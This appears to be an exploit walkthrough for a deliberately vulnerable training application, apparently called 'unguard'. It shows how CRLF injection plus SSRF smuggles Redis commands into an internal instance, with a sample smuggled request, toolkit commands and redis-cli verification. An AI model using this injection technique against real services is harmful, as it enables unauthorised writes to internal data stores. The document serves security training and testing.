A user can inject CRLF sequences into the server-sent HTTP request and therefore set arbitrary HTTP headers, leading to possible request smuggling to execute arbitrary Redis commands.
The used version of the Apache HTTPClient contains a vulnerability that allows attackers that control the value of an HTTP header to inject CRLF sequences. An attacker can therefore control parts of the request and can add arbitrary text (e.g. HTTP headers). It is possible to combine this with the SSRF vulnerability and smuggle RESP data inside the HTTP request and therefore send commands to the internal Redis.
When abusing this, an HTTP request can look something like this:
GET /something
X-Expected-Header: value # injecting a newline in the user controllable path here to control the line below
SET key value # any redis commands here
HTTP/1.1
Host: 127.0.0.1:6379
User-Agent: curl/7.52.1
Accept: */*
Content-Type: text/plain
...For this exploit to work you need:
- unguard deployed and running
- unguard-exploit-toolkit set up
Make sure to login first
$ ug-exploit login <USERNAME>Next, send your payload. Make sure to specify the Redis instance that is reachable from the frontend.
Within Docker or K8s, this should be unguard-redis:6379.
$ ug-exploit redis --redis-host unguard-redis:6379 ./exploits/crlf-injection/payload/hackedflag.txtYou can use any Redis client to verify that the exploit has worked. For convenience, you can SSH into the redis pod and use the Redis CLI:
$ kubectl exec -i -t -n unguard unguard-redis-6668588958-tm8l9 -c redis -- bash # specify your pod name
$ redis-cli
127.0.0.1:6379> GET hacked
exploitworked